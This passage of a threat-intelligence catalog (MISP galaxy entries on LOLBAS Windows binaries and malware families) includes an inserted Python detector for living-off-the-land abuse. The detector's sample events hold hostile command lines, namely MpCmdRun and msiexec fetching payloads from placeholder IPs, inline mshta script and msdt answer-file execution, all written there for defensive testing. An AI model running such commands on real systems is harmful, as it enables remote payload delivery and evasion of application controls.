Paths: * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe

Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus * https://twitter.com/mohammadaskar2/status/1301263551638761477 * https://twitter.com/Oddvarmoe/status/1301444858910052352 * https://twitter.com/NotMedic/status/1301506813242867720

Detection: * Sigma: win_susp_mpcmdrun_download.yml * Elastic: command_and_control_remote_file_copy_mpcmdrun.toml * IOC: MpCmdRun storing data into alternate data streams. * IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. * IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log * IOC: User Agent is "MpCommunication"[MpCmdRun.exe - LOLBAS Project]

Internal MISP references

UUID ec54a1e4-92d4-4503-a510-a18989f1f8f3 which can be used as unique global reference for MpCmdRun in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5127
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Msbuild

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to compile and execute code

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe * C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe

Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md * https://github.com/Cn33liz/MSBuildShell * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 * https://github.com/LOLBAS-Project/LOLBAS/issues/165 * https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files * https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events

Detection: * Sigma: file_event_win_shell_write_susp_directory.yml * Sigma: proc_creation_win_msbuild_susp_parent_process.yml * Sigma: net_connection_win_silenttrinity_stager_msbuild_activity.yml * Splunk: suspicious_msbuild_spawn.yml * Splunk: suspicious_msbuild_rename.yml * Splunk: msbuild_suspicious_spawned_by_script_process.yml * Elastic: defense_evasion_msbuild_beacon_sequence.toml * Elastic: defense_evasion_msbuild_making_network_connections.toml * Elastic: defense_evasion_execution_msbuild_started_by_script.toml * Elastic: defense_evasion_execution_msbuild_started_by_office_app.toml * Elastic: defense_evasion_execution_msbuild_started_renamed.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Msbuild.exe should not normally be executed on workstations[LOLBAS Msbuild]

Internal MISP references

UUID 1f500e4c-25a1-4570-a3ba-5c9cd463afde which can be used as unique global reference for Msbuild in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5128
source Tidal Cyber
tags ['dfda978e-e0a0-4e1a-85c7-d9ab2cd7ccc5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Msconfig

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows

Author: Oddvar Moe

Paths: * C:\Windows\System32\msconfig.exe

Resources: * https://twitter.com/pabraeken/status/991314564896690177

Detection: * Sigma: proc_creation_win_uac_bypass_msconfig_gui.yml * Sigma: file_event_win_uac_bypass_msconfig_gui.yml * IOC: mscfgtlc.xml changes in system32 folder[Msconfig.exe - LOLBAS Project]

Internal MISP references

UUID 90c6cc43-d9dd-436c-b7ee-ede979765bdf which can be used as unique global reference for Msconfig in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5129
source Tidal Cyber
tags ['7e20fe4e-6883-457d-81f9-b4010e739f89', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Msdeploy

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft tool used to deploy Web Applications.

Author: Oddvar Moe

Paths: * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe

Resources: * https://twitter.com/pabraeken/status/995837734379032576 * https://twitter.com/pabraeken/status/999090532839313408

Detection: * Sigma: proc_creation_win_lolbin_msdeploy.yml[Msdeploy.exe - LOLBAS Project]

Internal MISP references

UUID 175b32ed-bea6-491c-8aac-d088f642a6e1 which can be used as unique global reference for Msdeploy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5226
source Tidal Cyber
tags ['11452158-b8d2-4a33-952a-8896f961a2f5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Msdt

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft diagnostics tool

Author: Oddvar Moe

Paths: * C:\Windows\System32\Msdt.exe * C:\Windows\SysWOW64\Msdt.exe

Resources: * https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://twitter.com/harr0ey/status/991338229952598016 * https://twitter.com/nas_bench/status/1531944240271568896

Detection: * Sigma: proc_creation_win_lolbin_msdt_answer_file.yml * Sigma: proc_creation_win_msdt_arbitrary_command_execution.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[Msdt.exe - LOLBAS Project]

Internal MISP references

UUID bc39280c-da92-4e78-ab37-7c54ff72a1ba which can be used as unique global reference for Msdt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5130
source Tidal Cyber
tags ['8c30b46b-3651-4ccd-9d91-34fe89bc6843', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Msedge

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Edge browser

Author: mr.d0x

Paths: * c:\Program Files\Microsoft\Edge\Application\msedge.exe * c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Resources: * https://twitter.com/mrd0x/status/1478116126005641220 * https://twitter.com/mrd0x/status/1478234484881436672

Detection: * Sigma: proc_creation_win_browsers_msedge_arbitrary_download.yml * Sigma: proc_creation_win_browsers_chromium_headless_file_download.yml[Msedge.exe - LOLBAS Project]

Internal MISP references

UUID d64d75ba-1722-4a39-ab7f-d46c5d5815ec which can be used as unique global reference for Msedge in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5131
source Tidal Cyber
tags ['5bd3af6b-cb96-4d96-9576-26521dd76513', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

msedge_proxy

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Edge Browser

Author: Mert Daş

Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Resources: None Provided

Detection: None Provided[msedge_proxy.exe - LOLBAS Project]

Internal MISP references

UUID e098413e-1d54-4d1f-bf63-1443b57bcc2f which can be used as unique global reference for msedge_proxy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5182
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

msedgewebview2

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.

Author: Matan Bahar

Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe

Resources: * https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf

Detection: * IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path[msedgewebview2.exe - LOLBAS Project]

Internal MISP references

UUID ac6d4ab8-f34c-4b00-a943-cc2749b28a05 which can be used as unique global reference for msedgewebview2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5183
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Mshta

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to execute HTML Applications (.hta files)

Author: Oddvar Moe

Paths: * C:\Windows\System32\mshta.exe * C:\Windows\SysWOW64\mshta.exe

Resources: * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Detection: * Sigma: proc_creation_win_mshta_susp_pattern.yml * Sigma: proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml * Sigma: proc_creation_win_mshta_lethalhta_technique.yml * Sigma: proc_creation_win_mshta_javascript.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_mshta_beacon.toml * Elastic: lateral_movement_dcom_hta.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: suspicious_mshta_activity.yml * Splunk: detect_mshta_renamed.yml * Splunk: suspicious_mshta_spawn.yml * Splunk: suspicious_mshta_child_process.yml * Splunk: detect_mshta_url_in_command_line.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: mshta.exe executing raw or obfuscated script within the command-line * IOC: General usage of HTA file * IOC: mshta.exe network connection to Internet/WWW resource * IOC: DotNet CLR libraries loaded into mshta.exe * IOC: DotNet CLR Usage Log - mshta.exe.log[LOLBAS Mshta]

Internal MISP references

UUID f552a5a4-49dd-4ba6-9916-e631df4d4457 which can be used as unique global reference for Mshta in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5132
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fe0e2dd3-962e-41a3-9850-cea146b1301f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Mshtml

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft HTML Viewer

Author: LOLBAS Team

Paths: * c:\windows\system32\mshtml.dll * c:\windows\syswow64\mshtml.dll

Resources: * https://twitter.com/pabraeken/status/998567549670477824 * https://windows10dll.nirsoft.net/mshtml_dll.html

Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Mshtml.dll - LOLBAS Project]

Internal MISP references

UUID f94674b9-f924-4452-8516-49657ed40032 which can be used as unique global reference for Mshtml in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5192
source Tidal Cyber
tags ['46338353-52ee-4f8d-9f18-f1b32644dd76', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Msiexec

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to execute msi files

Author: Oddvar Moe

Paths: * C:\Windows\System32\msiexec.exe * C:\Windows\SysWOW64\msiexec.exe

Resources: * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ * https://twitter.com/PhilipTsukerman/status/992021361106268161 * https://badoption.eu/blog/2023/10/03/MSIFortune.html

Detection: * Sigma: proc_creation_win_msiexec_web_install.yml * Sigma: proc_creation_win_msiexec_masquerading.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * Splunk: uninstall_app_using_msiexec.yml * IOC: msiexec.exe retrieving files from Internet[LOLBAS Msiexec]

Internal MISP references

UUID 9d00d3c4-9a01-403a-9275-c94960fd871f which can be used as unique global reference for Msiexec in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5133
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fc2bbc6f-da5c-4afd-ae27-2fadf77c3bc4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

MsoHtmEd

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Office component

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe

Resources: None Provided

Detection: * Sigma: proc_creation_win_lolbin_msohtmed_download.yml * IOC: Suspicious Office application internet/network traffic[MsoHtmEd.exe - LOLBAS Project]

Internal MISP references

UUID d316ab94-0420-4356-a3bb-f92f42a4247c which can be used as unique global reference for MsoHtmEd in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5227
source Tidal Cyber
tags ['874c053b-d6b8-42c2-accc-cd256bb4d350', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Mspub

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Publisher

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe * C:\Program Files\Microsoft Office\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe * C:\Program Files\Microsoft Office\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe * C:\Program Files\Microsoft Office\Office14\MSPUB.exe

Resources: None Provided

Detection: * Sigma: proc_creation_win_lolbin_mspub_download.yml * IOC: Suspicious Office application internet/network traffic[Mspub.exe - LOLBAS Project]

Internal MISP references

UUID c07f48ee-4667-4dd3-aa8e-cb6d588c547c which can be used as unique global reference for Mspub in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5228
source Tidal Cyber
tags ['a523dcb0-9181-4170-a113-126df84594ca', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

msxsl

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Command line utility used to perform XSL transformations.

Author: Oddvar Moe

Paths: * no default

Resources: * https://twitter.com/subTee/status/877616321747271680 * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker * https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file

Detection: * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Elastic: defense_evasion_msxsl_beacon.toml * Elastic: defense_evasion_msxsl_network.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[msxsl.exe - LOLBAS Project]

Internal MISP references

UUID 8cccbfed-3f78-45fd-b5d1-efe884d28f09 which can be used as unique global reference for msxsl in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5229
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.
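The LOLBAS entries above (MpCmdRun, Msbuild, Msdt, Mshta, Msiexec, msedgewebview2 and msxsl) each list process-creation IOCs in prose. The following is an added example, not code from Tidal Cyber or the LOLBAS project, that turns those IOCs into a small rule set and runs it over constructed Sysmon-style process-creation records. It assumes Sysmon-like field names (image, original_file_name, command_line, parent_image, user) plus a hypothetical host_role tag supplied by inventory; the binary's identity is taken from OriginalFileName so that a renamed copy is still matched and additionally flagged. The specific switches matched, MpCmdRun's -DownloadFile and msdt's -af answer-file switch, come from the references the LOLBAS entries cite rather than from the page text. All sample events are constructed.

```python
"""Process-creation triage for the LOLBAS entries above (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet, List

Event = Dict[str, str]

SERVICE_USERS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WEBVIEW_FLAGS = ("--gpu-launcher", "--utility-cmd-prefix",
                 "--renderer-cmd-prefix", "--browser-subprocess-path")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_url(ev: Event) -> bool:
    return URL_RE.search(ev["command_line"]) is not None


def renamed(ev: Event) -> bool:
    """On-disk name differs from the PE's OriginalFileName (masquerading)."""
    return basename(ev["image"]) != ev["original_file_name"].lower()


@dataclass(frozen=True)
class Rule:
    name: str
    binaries: FrozenSet[str]            # OriginalFileName values, lower-case
    check: Callable[[Event], bool]


RULES: List[Rule] = [
    Rule("renamed_lolbin", frozenset({"mpcmdrun.exe", "msbuild.exe", "mshta.exe", "msiexec.exe"}), renamed),
    Rule("url_in_command_line", frozenset({"mpcmdrun.exe", "mshta.exe", "msiexec.exe", "msxsl.exe"}), has_url),
    Rule("mpcmdrun_non_service_user", frozenset({"mpcmdrun.exe"}),
         lambda ev: ev["user"].upper() not in SERVICE_USERS),
    Rule("mpcmdrun_download_switch", frozenset({"mpcmdrun.exe"}),
         lambda ev: "-downloadfile" in ev["command_line"].lower()),
    Rule("msbuild_on_workstation", frozenset({"msbuild.exe"}),
         lambda ev: ev["host_role"] == "workstation"),
    Rule("msbuild_script_or_office_parent", frozenset({"msbuild.exe"}),
         lambda ev: basename(ev["parent_image"]) in SCRIPT_HOSTS | OFFICE_APPS),
    Rule("mshta_inline_script", frozenset({"mshta.exe"}),
         lambda ev: re.search(r"\b(javascript|vbscript):", ev["command_line"], re.I) is not None),
    Rule("msdt_answer_file", frozenset({"msdt.exe"}),
         lambda ev: re.search(r"(?:^|\s)[-/]af\b", ev["command_line"], re.I) is not None),
    Rule("webview2_subprocess_override", frozenset({"msedgewebview2.exe"}),
         lambda ev: any(f in ev["command_line"].lower() for f in WEBVIEW_FLAGS)),
]


def detect(ev: Event) -> List[str]:
    """Names of the rules the event trips, in RULES order."""
    identity = ev["original_file_name"].lower()
    return [r.name for r in RULES if identity in r.binaries and r.check(ev)]


def scan(events: List[Event]) -> Dict[str, List[str]]:
    return {ev["id"]: detect(ev) for ev in events}


def _ev(id_, image, orig, cmd, parent, user="CORP\\alice", role="workstation") -> Event:
    return {"id": id_, "image": image, "original_file_name": orig, "command_line": cmd,
            "parent_image": parent, "user": user, "host_role": role}


DEFENDER = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\"
TEMP = "C:\\Users\\alice\\AppData\\Local\\Temp\\"

# Constructed sample events: e1 and e7 are expected benign, the rest should trip rules.
SAMPLE_EVENTS: List[Event] = [
    _ev("e1", DEFENDER + "MpCmdRun.exe", "MpCmdRun.exe", "MpCmdRun.exe -Scan -ScanType 1",
        DEFENDER + "MsMpEng.exe", user="NT AUTHORITY\\SYSTEM"),
    _ev("e2", DEFENDER + "MpCmdRun.exe", "MpCmdRun.exe",
        "MpCmdRun.exe -DownloadFile -url http://198.51.100.7/a.bin -path " + TEMP + "a.bin",
        "C:\\Windows\\System32\\cmd.exe"),
    _ev("e3", TEMP + "svchost.exe", "MSBuild.exe", "svchost.exe " + TEMP + "build.xml",
        "C:\\Windows\\System32\\wscript.exe"),
    _ev("e4", "C:\\Windows\\System32\\mshta.exe", "MSHTA.EXE",
        'mshta.exe vbscript:Execute("MsgBox 1:close")', "C:\\Windows\\System32\\cmd.exe"),
    _ev("e5", "C:\\Windows\\System32\\msiexec.exe", "msiexec.exe",
        "msiexec.exe /q /i https://203.0.113.9/pkg.msi",
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    _ev("e6", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe",
        "msedgewebview2.exe", 'msedgewebview2.exe --utility-cmd-prefix="' + TEMP + 'x.exe"',
        "C:\\Program Files\\SomeApp\\SomeApp.exe"),
    _ev("e7", "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "MSBuild.exe",
        "MSBuild.exe app.csproj /t:Build", "C:\\agent\\bin\\Agent.Worker.exe",
        user="CORP\\svc-build", role="build_server"),
    _ev("e8", "C:\\Windows\\System32\\msdt.exe", "msdt.exe",
        "msdt.exe -af " + TEMP + "answers.xml /skip TRUE", "C:\\Windows\\System32\\cmd.exe"),
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits or "clean")
```

The build-server event (e7) shows why msbuild_on_workstation keys on host role rather than on the binary alone: MSBuild is legitimate on build agents, and cmd.exe is deliberately left out of SCRIPT_HOSTS because build pipelines routinely launch it that way. Keying the rules on OriginalFileName rather than the image path is what makes the renamed copy in e3 still evaluate against the MSBuild rules.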

MURKYTOP

MURKYTOP is a reconnaissance tool used by Leviathan. [FireEye Periscope March 2018]

Internal MISP references

UUID 768111f9-0948-474b-82a6-cd5455079513 which can be used as unique global reference for MURKYTOP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0233
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Mythic

Mythic is an open source, cross-platform post-exploitation/command and control platform. Mythic is designed to "plug-n-play" with various agents and communication channels.[Mythic Github][Mythic SpecterOps][Mythc Documentation] Deployed Mythic C2 servers have been observed as part of potentially malicious infrastructure.[RecordedFuture 2021 Ad Infra]

Internal MISP references

UUID f1398367-a0af-4a89-b240-50cae4985ed9 which can be used as unique global reference for Mythic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0699
source MITRE
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['tool']

Naid

Naid is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Naid June 2012]

Internal MISP references

UUID 5cfd6135-c53b-4234-a17e-759494b2101f which can be used as unique global reference for Naid in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0205
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute. [Proofpoint Leviathan Oct 2017] [fsecure NanHaiShu July 2016]

Internal MISP references

UUID 0e28dfc9-8948-4c08-b7d8-9e80e19cc464 which can be used as unique global reference for NanHaiShu in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0228
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

NanoCore

NanoCore is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.[DigiTrust NanoCore Jan 2017][Cofense NanoCore Mar 2018][PaloAlto NanoCore Feb 2016][Unit 42 Gorgon Group Aug 2018]

Internal MISP references

UUID db05dbaa-eb3a-4303-b37e-18d67e7e85a1 which can be used as unique global reference for NanoCore in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0336
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

NativeZone

NativeZone is the name given collectively to disposable custom Cobalt Strike loaders used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021][SentinelOne NobleBaron June 2021]

Internal MISP references

UUID a814fd1d-8c2c-41b3-bb3a-30c4318c74c0 which can be used as unique global reference for NativeZone in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0637
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

NavRAT

NavRAT is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. [Talos NavRAT May 2018]

Internal MISP references

UUID b410d30c-4db6-4239-950e-9b0e0521f0d2 which can be used as unique global reference for NavRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0247
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']
Related clusters

To see the related clusters, click here.

NBTscan

NBTscan is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.[Debian nbtscan Nov 2019][SecTools nbtscan June 2003][Symantec Waterbug Jun 2019][FireEye APT39 Jan 2019]

Internal MISP references

UUID 950f13e6-3ae3-411e-a2b2-4ba1afe6cb76 which can be used as unique global reference for NBTscan in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0590
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

nbtstat

nbtstat is a utility used to troubleshoot NetBIOS name resolution. [TechNet Nbtstat]

Internal MISP references

UUID 81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e which can be used as unique global reference for nbtstat in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0102
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

NDiskMonitor

NDiskMonitor is a custom backdoor written in .NET that appears to be unique to Patchwork. [TrendMicro Patchwork Dec 2017]

Internal MISP references

UUID 6d42e6c5-3056-4ff1-8d5d-a736807ec84c which can be used as unique global reference for NDiskMonitor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
